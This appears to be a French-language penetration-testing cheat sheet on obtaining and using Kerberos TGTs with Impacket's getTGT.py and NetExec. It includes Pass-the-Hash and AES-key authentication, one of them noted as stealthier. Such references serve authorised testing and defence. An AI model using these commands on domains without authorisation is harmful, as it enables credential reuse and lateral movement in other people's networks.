Copy command
getTGT.py $DOMAIN/$USER:$PASSDescription: Obtenir un TGT valide pour l'utilisateur : point de départ de toute auth Kerberos.
Information Gathering
Obtenir et utiliser des TGTs pour s'authentifier sans transmettre de mot de passe.
getTGT.py $DOMAIN/$USER:$PASSDescription: Obtenir un TGT valide pour l'utilisateur : point de départ de toute auth Kerberos.
getTGT.py $DOMAIN/$USER -hashes :$NTHASHDescription: TGT via Pass-the-Hash : pas besoin du mot de passe en clair.
export KRB5CCNAME=$USER.ccacheDescription: Définir le ticket actif dans la variable d'env pour tous les outils impacket.
klistDescription: Lister les tickets Kerberos actifs dans le ccache courant.
nxc smb $TARGET -u $USER -p '' --use-kcacheDescription: S'authentifier via Kerberos (ccache) sans envoyer de hash ni de password.
getTGT.py $DOMAIN/$USER -aesKey $AES_KEYDescription: TGT via clé AES256 : plus discret que RC4 si le compte a des clés AES.